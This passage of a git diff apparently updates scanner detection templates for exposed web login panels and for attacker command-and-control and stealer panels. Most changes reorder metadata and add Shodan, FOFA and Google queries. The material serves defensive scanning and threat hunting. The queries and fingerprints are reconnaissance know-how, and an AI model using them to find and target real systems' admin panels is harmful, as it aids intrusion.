a/http/exposed-panels/atlantis-detect.yaml b/http/exposed-panels/atlantis-detect.yaml index b8b0ab3df1..923ee50a4d 100644 --- a/http/exposed-panels/atlantis-detect.yaml +++ b/http/exposed-panels/atlantis-detect.yaml @@ -12,11 +12,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:runatlantis:atlantis:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: runatlantis product: atlantis shodan-query: http.favicon.hash:-1706783005 - vendor: runatlantis - verified: true + fofa-query: icon_hash=-1706783005 tags: panel,atlantis,runatlantis http: diff --git a/http/exposed-panels/atlassian-bamboo-panel.yaml b/http/exposed-panels/atlassian-bamboo-panel.yaml index f09d8afd9b..4d661a593c 100644 --- a/http/exposed-panels/atlassian-bamboo-panel.yaml +++ b/http/exposed-panels/atlassian-bamboo-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.atlassian.com/software/bamboo metadata: + verified: true max-request: 1 shodan-query: http.title:"Bamboo" - verified: true tags: panel,bamboo,login,detect http: diff --git a/http/exposed-panels/atlassian-crowd-panel.yaml b/http/exposed-panels/atlassian-crowd-panel.yaml index 46d60c3106..bf9f0769b8 100644 --- a/http/exposed-panels/atlassian-crowd-panel.yaml +++ b/http/exposed-panels/atlassian-crowd-panel.yaml @@ -11,10 +11,11 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:* metadata: - category: sso max-request: 1 - product: crowd vendor: atlassian + product: crowd + category: sso + shodan-query: http.component:"atlassian jira" tags: panel,atlassian http: diff --git a/http/exposed-panels/audiobookshelf-panel.yaml b/http/exposed-panels/audiobookshelf-panel.yaml index 47a1227c37..344c24df9c 100644 --- a/http/exposed-panels/audiobookshelf-panel.yaml +++ b/http/exposed-panels/audiobookshelf-panel.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/advplyr/audiobookshelf metadata: + verified: true max-request: 2 shodan-query: title:"Audiobookshelf" - verified: true tags: panel,audiobookshelf,detect http: diff --git a/http/exposed-panels/audiocodes-detect.yaml b/http/exposed-panels/audiocodes-detect.yaml index 31fd950bd3..b238a8f217 100644 --- a/http/exposed-panels/audiocodes-detect.yaml +++ b/http/exposed-panels/audiocodes-detect.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"Audiocodes" - verified: true tags: panel,audiocodes http: diff --git a/http/exposed-panels/authelia-panel.yaml b/http/exposed-panels/authelia-panel.yaml index fbdb95d748..a870f2c5cb 100644 --- a/http/exposed-panels/authelia-panel.yaml +++ b/http/exposed-panels/authelia-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/authelia/authelia - https://www.authelia.com/ metadata: + verified: true max-request: 1 shodan-query: title:"Login - Authelia" - verified: true tags: login,panel,authelia http: diff --git a/http/exposed-panels/automatisch-panel.yaml b/http/exposed-panels/automatisch-panel.yaml index a9d888edee..820ccb5a6d 100644 --- a/http/exposed-panels/automatisch-panel.yaml +++ b/http/exposed-panels/automatisch-panel.yaml @@ -10,9 +10,9 @@ info: - https://automatisch.io/ - https://github.com/automatisch/automatisch metadata: + verified: true max-request: 2 shodan-query: title:"Automatisch" - verified: true tags: panel,automatisch,detect http: diff --git a/http/exposed-panels/autoset-detect.yaml b/http/exposed-panels/autoset-detect.yaml index d3d2b8c6d6..d891720054 100644 --- a/http/exposed-panels/autoset-detect.yaml +++ b/http/exposed-panels/autoset-detect.yaml @@ -7,10 +7,10 @@ info: reference: - http://autoset.net/xe/ metadata: + verified: true max-request: 1 shodan-query: title:"AutoSet" - verified: true - tags: tech,php,autoset,apache + tags: tech,php,autoset,apache,panel http: - method: GET diff --git a/http/exposed-panels/avantfax-panel.yaml b/http/exposed-panels/avantfax-panel.yaml index f2ed76974b..15f44f7e53 100644 --- a/http/exposed-panels/avantfax-panel.yaml +++ b/http/exposed-panels/avantfax-panel.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:avantfax:avantfax:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: avantfax - shodan-query: http.title:"AvantFAX - Login" vendor: avantfax + product: avantfax + shodan-query: + - http.title:"AvantFAX - Login" + - http.title:"avantfax - login" + fofa-query: title="avantfax - login" + google-query: intitle:"avantfax - login" tags: panel,avantfax,login http: diff --git a/http/exposed-panels/avaya/avayaaura-cm-panel.yaml b/http/exposed-panels/avaya/avayaaura-cm-panel.yaml index e8a90e426a..d5fc1c9f4a 100644 --- a/http/exposed-panels/avaya/avayaaura-cm-panel.yaml +++ b/http/exposed-panels/avaya/avayaaura-cm-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:avaya:aura_communication_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: aura_communication_manager vendor: avaya + product: aura_communication_manager tags: panel,avaya http: diff --git a/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml b/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml index ad8275d351..2f87f2202d 100644 --- a/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml +++ b/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:avaya:aura_system_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: aura_system_manager vendor: avaya + product: aura_system_manager tags: panel,avaya http: diff --git a/http/exposed-panels/aviatrix-panel.yaml b/http/exposed-panels/aviatrix-panel.yaml index 53e4233d1b..4508727381 100644 --- a/http/exposed-panels/aviatrix-panel.yaml +++ b/http/exposed-panels/aviatrix-panel.yaml @@ -12,9 +12,13 @@ info: cpe: cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: controller - shodan-query: http.title:"Aviatrix Cloud Controller" vendor: aviatrix + product: controller + shodan-query: + - http.title:"Aviatrix Cloud Controller" + - http.title:"aviatrix cloud controller" + fofa-query: title="aviatrix cloud controller" + google-query: intitle:"aviatrix cloud controller" tags: panel,aviatrix http: diff --git a/http/exposed-panels/avigilon-panel.yaml b/http/exposed-panels/avigilon-panel.yaml index e685f90c2b..ebcc001bc6 100644 --- a/http/exposed-panels/avigilon-panel.yaml +++ b/http/exposed-panels/avigilon-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:avigilon:avigilon_control_center:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: avigilon_control_center - shodan-query: http.title:"Login - Avigilon Control Center" - vendor: avigilon verified: true + max-request: 1 + vendor: avigilon + product: avigilon_control_center + shodan-query: + - http.title:"Login - Avigilon Control Center" + - http.title:"login - avigilon control center" + fofa-query: title="login - avigilon control center" + google-query: intitle:"login - avigilon control center" tags: panel,avigilon http: diff --git a/http/exposed-panels/aws-ec2-autoscale.yaml b/http/exposed-panels/aws-ec2-autoscale.yaml index bd21d67803..dcf58b2434 100644 --- a/http/exposed-panels/aws-ec2-autoscale.yaml +++ b/http/exposed-panels/aws-ec2-autoscale.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo/?fbid=620605120110011&set=a.467014098802448 metadata: + verified: true max-request: 1 shodan-query: html:"AWS EC2 Auto Scaling Lab" - verified: true tags: exposure,ec2,aws,amazon,panel http: diff --git a/http/exposed-panels/aws-opensearch-login.yaml b/http/exposed-panels/aws-opensearch-login.yaml index 57a2128475..387441e6c8 100644 --- a/http/exposed-panels/aws-opensearch-login.yaml +++ b/http/exposed-panels/aws-opensearch-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:amazon:opensearch:*:*:*:*:maven:*:*:* metadata: max-request: 1 - product: opensearch vendor: amazon + product: opensearch tags: panel,opensearch,aws,amazon http: diff --git a/http/exposed-panels/axel-webserver.yaml b/http/exposed-panels/axel-webserver.yaml index 4bf951cac5..01c1e2325f 100644 --- a/http/exposed-panels/axel-webserver.yaml +++ b/http/exposed-panels/axel-webserver.yaml @@ -9,10 +9,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="AxelWebServer" + verified: true max-request: 1 shodan-query: http.title:"Axel" - verified: true + fofa-query: app="AxelWebServer" tags: panel,axel,webserver http: diff --git a/http/exposed-panels/axway-api-manager-panel.yaml b/http/exposed-panels/axway-api-manager-panel.yaml index eb61cd9622..daefc4aae2 100644 --- a/http/exposed-panels/axway-api-manager-panel.yaml +++ b/http/exposed-panels/axway-api-manager-panel.yaml @@ -5,9 +5,9 @@ info: author: johnk3r severity: info metadata: + verified: true max-request: 1 shodan-query: http.title:"Axway API Manager Login" - verified: true tags: panel,axway,detect http: diff --git a/http/exposed-panels/axway-securetransport-panel.yaml b/http/exposed-panels/axway-securetransport-panel.yaml index 91db597ee1..7415fa09ee 100644 --- a/http/exposed-panels/axway-securetransport-panel.yaml +++ b/http/exposed-panels/axway-securetransport-panel.yaml @@ -13,11 +13,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:axway:securetransport:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: securetransport - shodan-query: http.title:"SecureTransport" || http.favicon.hash:1330269434 - vendor: axway verified: true + max-request: 1 + vendor: axway + product: securetransport + shodan-query: + - http.title:"SecureTransport" || http.favicon.hash:1330269434 + - http.title:"st web client" + - http.title:"securetransport" || http.favicon.hash:1330269434 + google-query: + - intitle:"st web client" + - intitle:"securetransport" || http.favicon.hash:1330269434 + fofa-query: + - title="securetransport" || http.favicon.hash:1330269434 + - title="st web client" tags: panel,axway,securetransport http: diff --git a/http/exposed-panels/axway-securetransport-webclient.yaml b/http/exposed-panels/axway-securetransport-webclient.yaml index a26113b572..46f22a57ec 100644 --- a/http/exposed-panels/axway-securetransport-webclient.yaml +++ b/http/exposed-panels/axway-securetransport-webclient.yaml @@ -12,11 +12,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:axway:securetransport:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"ST Web Client" - max-request: 1 - product: securetransport - vendor: axway verified: true + max-request: 1 + vendor: axway + product: securetransport + google-query: + - intitle:"ST Web Client" + - intitle:"st web client" + - intitle:"securetransport" || http.favicon.hash:1330269434 + shodan-query: + - http.title:"st web client" + - http.title:"securetransport" || http.favicon.hash:1330269434 + fofa-query: + - title="securetransport" || http.favicon.hash:1330269434 + - title="st web client" tags: panel,axway,securetransport,webclient http: diff --git a/http/exposed-panels/axxon-client-panel.yaml b/http/exposed-panels/axxon-client-panel.yaml index 81107ae2cc..349970fb55 100644 --- a/http/exposed-panels/axxon-client-panel.yaml +++ b/http/exposed-panels/axxon-client-panel.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:axxonsoft:axxon_next:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: axxon_next - shodan-query: title:"Axxon Next client" - vendor: axxonsoft verified: true + max-request: 1 + vendor: axxonsoft + product: axxon_next + shodan-query: + - title:"Axxon Next client" + - http.title:"axxon next client" + fofa-query: title="axxon next client" + google-query: intitle:"axxon next client" tags: panel,axxon,vms,login,detect,axxonsoft http: diff --git a/http/exposed-panels/bedita-panel.yaml b/http/exposed-panels/bedita-panel.yaml index ddb5e1c160..a8293378b0 100644 --- a/http/exposed-panels/bedita-panel.yaml +++ b/http/exposed-panels/bedita-panel.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:bedita:bedita:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: bedita - shodan-query: http.title:"BEdita" vendor: bedita + product: bedita + shodan-query: + - http.title:"BEdita" + - http.title:"bedita" + fofa-query: title="bedita" + google-query: intitle:"bedita" tags: panel,bedita http: diff --git a/http/exposed-panels/beego-admin-dashboard.yaml b/http/exposed-panels/beego-admin-dashboard.yaml index 22d1488037..23cd9abd20 100644 --- a/http/exposed-panels/beego-admin-dashboard.yaml +++ b/http/exposed-panels/beego-admin-dashboard.yaml @@ -14,11 +14,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:beego:beego:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: beego - shodan-query: html:"Beego Admin Dashboard" - vendor: beego verified: true + max-request: 1 + vendor: beego + product: beego + shodan-query: + - html:"Beego Admin Dashboard" + - http.html:"beego admin dashboard" + fofa-query: body="beego admin dashboard" tags: panel,beego,unauth http: diff --git a/http/exposed-panels/beyondtrust-priv-panel.yaml b/http/exposed-panels/beyondtrust-priv-panel.yaml index c229ddb16e..d5ce877fa1 100644 --- a/http/exposed-panels/beyondtrust-priv-panel.yaml +++ b/http/exposed-panels/beyondtrust-priv-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.beyondtrust.com/products/privileged-remote-access metadata: - max-request: 1 - shodan-query: http.html:"BeyondTrust Privileged Remote Access Login" verified: true + max-request: 2 + shodan-query: "http.html:\"BeyondTrust Privileged Remote Access Login\"" tags: panel,beyondtrust,login,detect http: diff --git a/http/exposed-panels/bigbluebutton-login.yaml b/http/exposed-panels/bigbluebutton-login.yaml index 4138ba3f2e..7ff1746bb1 100644 --- a/http/exposed-panels/bigbluebutton-login.yaml +++ b/http/exposed-panels/bigbluebutton-login.yaml @@ -12,8 +12,8 @@ info: cpe: cpe:2.3:a:bigbluebutton:greenlight:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: greenlight vendor: bigbluebutton + product: greenlight tags: panel,bigbluebutton http: diff --git a/http/exposed-panels/bigfix-login.yaml b/http/exposed-panels/bigfix-login.yaml index 9c5494fb58..a68e11a863 100644 --- a/http/exposed-panels/bigfix-login.yaml +++ b/http/exposed-panels/bigfix-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"BigFix" max-request: 1 shodan-query: http.title:"BigFix" + google-query: intitle:"BigFix" tags: panel,bigfix http: diff --git a/http/exposed-panels/bigip-rest-panel.yaml b/http/exposed-panels/bigip-rest-panel.yaml index cc49e1b1c3..12ccfb4d07 100644 --- a/http/exposed-panels/bigip-rest-panel.yaml +++ b/http/exposed-panels/bigip-rest-panel.yaml @@ -16,9 +16,13 @@ info: cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: big-ip_access_policy_manager - shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" vendor: f5 + product: big-ip_access_policy_manager + shodan-query: + - http.title:"BIG-IP®-+Redirect" +"Server" + - http.title:"big-ip®-+redirect" +"server" + fofa-query: title="big-ip®-+redirect" +"server" + google-query: intitle:"big-ip®-+redirect" +"server" tags: panel,bigip,f5 http: diff --git a/http/exposed-panels/biotime-panel.yaml b/http/exposed-panels/biotime-panel.yaml index c5b589e260..a9efea6b24 100644 --- a/http/exposed-panels/biotime-panel.yaml +++ b/http/exposed-panels/biotime-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.title:"BioTime" - verified: true tags: panel,biotime http: diff --git a/http/exposed-panels/bitdefender-gravityzone.yaml b/http/exposed-panels/bitdefender-gravityzone.yaml index 56ce04d8b4..cff67665dc 100644 --- a/http/exposed-panels/bitdefender-gravityzone.yaml +++ b/http/exposed-panels/bitdefender-gravityzone.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:bitdefender:gravityzone:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: gravityzone - shodan-query: title:"Bitdefender GravityZone" - vendor: bitdefender verified: true + max-request: 1 + vendor: bitdefender + product: gravityzone + shodan-query: + - title:"Bitdefender GravityZone" + - http.title:"bitdefender gravityzone" + fofa-query: title="bitdefender gravityzone" + google-query: intitle:"bitdefender gravityzone" tags: panel,bitdefender http: diff --git a/http/exposed-panels/bitrix-panel.yaml b/http/exposed-panels/bitrix-panel.yaml index 358de53163..b8b2eb385a 100644 --- a/http/exposed-panels/bitrix-panel.yaml +++ b/http/exposed-panels/bitrix-panel.yaml @@ -10,8 +10,10 @@ info: cpe: cpe:2.3:a:bitrix:bitrix24:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: bitrix24 vendor: bitrix + product: bitrix24 + shodan-query: http.html:"/bitrix/" + fofa-query: body="/bitrix/" tags: panel,bitrix,login http: diff --git a/http/exposed-panels/bitwarden-vault-panel.yaml b/http/exposed-panels/bitwarden-vault-panel.yaml index c0f79ca4db..2e7382eedc 100644 --- a/http/exposed-panels/bitwarden-vault-panel.yaml +++ b/http/exposed-panels/bitwarden-vault-panel.yaml @@ -9,11 +9,15 @@ info: classification: cpe: cpe:2.3:a:bitwarden:bitwarden:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: bitwarden - shodan-query: title:"Bitwarden Web Vault" - vendor: bitwarden verified: true + max-request: 1 + vendor: bitwarden + product: bitwarden + shodan-query: + - title:"Bitwarden Web Vault" + - http.title:"bitwarden web vault" + fofa-query: title="bitwarden web vault" + google-query: intitle:"bitwarden web vault" tags: panel,bitwarden,vault,detect http: diff --git a/http/exposed-panels/black-duck-panel.yaml b/http/exposed-panels/black-duck-panel.yaml index b7abefcc13..5464f2025e 100644 --- a/http/exposed-panels/black-duck-panel.yaml +++ b/http/exposed-panels/black-duck-panel.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Black Duck" - verified: true tags: panel,blackduck,synopsys http: diff --git a/http/exposed-panels/bloofoxcms-login-panel.yaml b/http/exposed-panels/bloofoxcms-login-panel.yaml index c70416ad14..4496189c18 100644 --- a/http/exposed-panels/bloofoxcms-login-panel.yaml +++ b/http/exposed-panels/bloofoxcms-login-panel.yaml @@ -7,11 +7,13 @@ info: classification: cpe: cpe:2.3:a:bloofox:bloofoxcms:*:*:*:*:*:*:*:* metadata: - fofa-query: Powered by bloofoxCMS - max-request: 2 - product: bloofoxcms - vendor: bloofox verified: "true" + max-request: 2 + vendor: bloofox + product: bloofoxcms + fofa-query: + - Powered by bloofoxCMS + - powered by bloofoxcms tags: panel,bloofox,cms http: diff --git a/http/exposed-panels/bmc/bmc-discovery-panel.yaml b/http/exposed-panels/bmc/bmc-discovery-panel.yaml index f7a06681ee..8ad4ee183e 100644 --- a/http/exposed-panels/bmc/bmc-discovery-panel.yaml +++ b/http/exposed-panels/bmc/bmc-discovery-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"BMC Software" - verified: true tags: panel,bmc http: diff --git a/http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml b/http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml index b872e66d2a..236c050329 100644 --- a/http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml +++ b/http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml @@ -1,19 +1,19 @@ id: bmc-remedy-sso-panel -info: - name: BMC Remedy SSO Login Panel - Detect - author: righettod - severity: info - description: | - BMC Remedy Single Sign-On domain data entry login panel was detected. - reference: - - https://www.bmc.com/it-solutions/remedy-itsm.html - metadata: - verified: true - max-request: 2 - shodan-query: http.title:"BMC Remedy Single Sign-On domain data entry" - tags: panel,bmc,login,detect - +info: + name: BMC Remedy SSO Login Panel - Detect + author: righettod + severity: info + description: | + BMC Remedy Single Sign-On domain data entry login panel was detected. + reference: + - https://www.bmc.com/it-solutions/remedy-itsm.html + metadata: + verified: true + max-request: 2 + shodan-query: http.title:"BMC Remedy Single Sign-On domain data entry" + tags: panel,bmc,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/bolt-cms-panel.yaml b/http/exposed-panels/bolt-cms-panel.yaml index 540b00d09c..339719234c 100644 --- a/http/exposed-panels/bolt-cms-panel.yaml +++ b/http/exposed-panels/bolt-cms-panel.yaml @@ -13,8 +13,9 @@ info: cpe: cpe:2.3:a:boltcms:bolt:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: bolt vendor: boltcms + product: bolt + shodan-query: cpe:"cpe:2.3:a:bolt:bolt" tags: panel,bolt,cms,login,boltcms http: diff --git a/http/exposed-panels/bookstack-panel.yaml b/http/exposed-panels/bookstack-panel.yaml index d2e5dc91c6..5040dec0f9 100644 --- a/http/exposed-panels/bookstack-panel.yaml +++ b/http/exposed-panels/bookstack-panel.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:bookstackapp:bookstack:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: bookstack - shodan-query: http.title:"BookStack" vendor: bookstackapp + product: bookstack + shodan-query: + - http.title:"BookStack" + - http.title:"bookstack" + fofa-query: title="bookstack" + google-query: intitle:"bookstack" tags: panel,bookstack,bookstackapp http: diff --git a/http/exposed-panels/buildbot-panel.yaml b/http/exposed-panels/buildbot-panel.yaml index 6fd9dc497e..8b4a587b89 100644 --- a/http/exposed-panels/buildbot-panel.yaml +++ b/http/exposed-panels/buildbot-panel.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:buildbot:buildbot:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: buildbot - shodan-query: http.title:"BuildBot" - vendor: buildbot verified: true + max-request: 1 + vendor: buildbot + product: buildbot + shodan-query: + - http.title:"BuildBot" + - http.title:"buildbot" + fofa-query: title="buildbot" + google-query: intitle:"buildbot" tags: panel,buildbot,cicd http: diff --git a/http/exposed-panels/busybox-repository-browser.yaml b/http/exposed-panels/busybox-repository-browser.yaml index 3c9139c8e6..b4cbda0fe7 100644 --- a/http/exposed-panels/busybox-repository-browser.yaml +++ b/http/exposed-panels/busybox-repository-browser.yaml @@ -9,10 +9,10 @@ info: reference: - https://github.com/mirror/busybox metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: title="Busybox Repository Browser" - tags: detect,busybox,oss + tags: detect,busybox,oss,panel http: - method: GET diff --git a/http/exposed-panels/bynder-panel.yaml b/http/exposed-panels/bynder-panel.yaml index 9d72dff4bd..4df9fcf7e8 100644 --- a/http/exposed-panels/bynder-panel.yaml +++ b/http/exposed-panels/bynder-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.bynder.com/en/ metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1017650009 - verified: true tags: panel,bynder,login,detect http: diff --git a/http/exposed-panels/c2/ares-rat-c2.yaml b/http/exposed-panels/c2/ares-rat-c2.yaml index 71aa6b7939..8e2cda4833 100644 --- a/http/exposed-panels/c2/ares-rat-c2.yaml +++ b/http/exposed-panels/c2/ares-rat-c2.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py metadata: + verified: true max-request: 1 shodan-query: product:'Ares RAT C2' - verified: true tags: c2,ir,osint,ares,panel,rat http: diff --git a/http/exposed-panels/c2/brute-ratel-c4.yaml b/http/exposed-panels/c2/brute-ratel-c4.yaml index 31e53afd96..81aa3b1c5f 100644 --- a/http/exposed-panels/c2/brute-ratel-c4.yaml +++ b/http/exposed-panels/c2/brute-ratel-c4.yaml @@ -9,9 +9,9 @@ info: reference: - https://bruteratel.com/ metadata: + verified: "true" max-request: 1 shodan-query: http.html_hash:-1957161625 - verified: "true" tags: c2,bruteratel,c4,panel http: diff --git a/http/exposed-panels/c2/caldera-c2.yaml b/http/exposed-panels/c2/caldera-c2.yaml index d8092dae1d..c9b0c10605 100644 --- a/http/exposed-panels/c2/caldera-c2.yaml +++ b/http/exposed-panels/c2/caldera-c2.yaml @@ -10,9 +10,9 @@ info: - https://github.com/mitre/caldera - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py metadata: - fofa-query: http.favicon.hash:-636718605 - max-request: 1 verified: true + max-request: 1 + fofa-query: http.favicon.hash:-636718605 tags: c2,ir,osint,caldera,panel http: diff --git a/http/exposed-panels/c2/covenant-c2.yaml b/http/exposed-panels/c2/covenant-c2.yaml index 3321d610c8..b4a69cce82 100644 --- a/http/exposed-panels/c2/covenant-c2.yaml +++ b/http/exposed-panels/c2/covenant-c2.yaml @@ -9,9 +9,9 @@ info: reference: | https://www.socinvestigation.com/shodan-filters-to-hunt-adversaries-infrastructure-and-c2/ metadata: + verified: true max-request: 1 shodan-query: ssl:”Covenant” http.component:”Blazor” - verified: true tags: c2,ir,osint,covenant,panel http: diff --git a/http/exposed-panels/c2/deimos-c2.yaml b/http/exposed-panels/c2/deimos-c2.yaml index ec42a53d8f..0676958d0c 100644 --- a/http/exposed-panels/c2/deimos-c2.yaml +++ b/http/exposed-panels/c2/deimos-c2.yaml @@ -9,9 +9,9 @@ info: reference: | https://twitter.com/MichalKoczwara/status/1551632627387473920 metadata: + verified: true max-request: 1 shodan-query: http.html_hash:-14029177 - verified: true tags: c2,ir,osint,deimosc2,panel http: diff --git a/http/exposed-panels/c2/empire-c2.yaml b/http/exposed-panels/c2/empire-c2.yaml index 33aa844a71..8704c38beb 100644 --- a/http/exposed-panels/c2/empire-c2.yaml +++ b/http/exposed-panels/c2/empire-c2.yaml @@ -10,9 +10,9 @@ info: - https://github.com/thehappydinoa/awesome-censys-queries#security-applications - https://bc-security.gitbook.io/empire-wiki/ metadata: - censys-query: bc517bf173440dad15b99a051389fadc366d5df2 || dcb32e6256459d3660fdc90e4c79e95a921841cc - max-request: 1 verified: "true" + max-request: 1 + censys-query: bc517bf173440dad15b99a051389fadc366d5df2 || dcb32e6256459d3660fdc90e4c79e95a921841cc tags: c2,ir,osint,empire,panel http: diff --git a/http/exposed-panels/c2/evilginx.yaml b/http/exposed-panels/c2/evilginx.yaml index 33fe9927d3..a337c6bf28 100644 --- a/http/exposed-panels/c2/evilginx.yaml +++ b/http/exposed-panels/c2/evilginx.yaml @@ -9,9 +9,9 @@ info: reference: - https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-infrastructure/delivery/evilginx metadata: - censys-query: b18d778b4e4b6bf1fd5b2d790c941270145a6a6d - max-request: 1 verified: "true" + max-request: 1 + censys-query: b18d778b4e4b6bf1fd5b2d790c941270145a6a6d tags: tech,evilginx,c2,phishing,panel http: diff --git a/http/exposed-panels/c2/hack5-cloud-c2.yaml b/http/exposed-panels/c2/hack5-cloud-c2.yaml index 3a591b9c05..f2bb9eb10f 100644 --- a/http/exposed-panels/c2/hack5-cloud-c2.yaml +++ b/http/exposed-panels/c2/hack5-cloud-c2.yaml @@ -9,9 +9,9 @@ info: reference: - https://twitter.com/fofabot/status/1742737671037091854 metadata: - fofa-query: app="Hak5-C2" - max-request: 1 verified: true + max-request: 1 + fofa-query: app="Hak5-C2" tags: c2,ir,osint,hack5c2,panel http: diff --git a/http/exposed-panels/c2/hookbot-rat.yaml b/http/exposed-panels/c2/hookbot-rat.yaml index b5859c0e76..800de730da 100644 --- a/http/exposed-panels/c2/hookbot-rat.yaml +++ b/http/exposed-panels/c2/hookbot-rat.yaml @@ -7,9 +7,9 @@ info: description: | Hookbot panel were detected. metadata: + verified: true max-request: 1 shodan-query: title:"hookbot" - verified: true tags: tech,rat,hookbot,c2,panel,detect http: diff --git a/http/exposed-panels/c2/meduza-stealer.yaml b/http/exposed-panels/c2/meduza-stealer.yaml index d0656a3536..e2d64c3292 100644 --- a/http/exposed-panels/c2/meduza-stealer.yaml +++ b/http/exposed-panels/c2/meduza-stealer.yaml @@ -7,9 +7,9 @@ info: description: | Meduza Stealer panel were detected. metadata: + verified: "true" max-request: 1 shodan-query: http.title:"Meduza Stealer" - verified: "true" tags: rat,meduza-stealer,c2,panel http: diff --git a/http/exposed-panels/c2/mystic-stealer.yaml b/http/exposed-panels/c2/mystic-stealer.yaml index cb4971803b..9407d10f67 100644 --- a/http/exposed-panels/c2/mystic-stealer.yaml +++ b/http/exposed-panels/c2/mystic-stealer.yaml @@ -7,9 +7,9 @@ info: description: | Mystic Stealer panel were detected. metadata: + verified: "true" max-request: 1 shodan-query: http.title:"Mystic Stealer" - verified: "true" tags: tech,rat,mystic-stealer,c2,panel http: diff --git a/http/exposed-panels/c2/mythic-c2.yaml b/http/exposed-panels/c2/mythic-c2.yaml index 6c80b2a5fb..7ae2886353 100644 --- a/http/exposed-panels/c2/mythic-c2.yaml +++ b/http/exposed-panels/c2/mythic-c2.yaml @@ -10,9 +10,9 @@ info: reference: | https://www.socinvestigation.com/shodan-filters-to-hunt-adversaries-infrastructure-and-c2/ metadata: + verified: true max-request: 1 shodan-query: ssl:Mythic port:7443 - verified: true tags: c2,ir,osint,mythic,panel http: diff --git a/http/exposed-panels/c2/nh-c2.yaml b/http/exposed-panels/c2/nh-c2.yaml index 4dc4466b6a..b05a9f341b 100644 --- a/http/exposed-panels/c2/nh-c2.yaml +++ b/http/exposed-panels/c2/nh-c2.yaml @@ -7,9 +7,9 @@ info: reference: - https://twitter.com/MichalKoczwara/status/1616179246216396806 metadata: - censys-query: 10baf5fcdde4563d3e145a1f553ae433fb1c3572 - max-request: 1 verified: "true" + max-request: 1 + censys-query: 10baf5fcdde4563d3e145a1f553ae433fb1c3572 tags: tech,nh,c2,panel http: diff --git a/http/exposed-panels/c2/pupyc2.yaml b/http/exposed-panels/c2/pupyc2.yaml index 694db8c8f7..ed163b0dc9 100644 --- a/http/exposed-panels/c2/pupyc2.yaml +++ b/http/exposed-panels/c2/pupyc2.yaml @@ 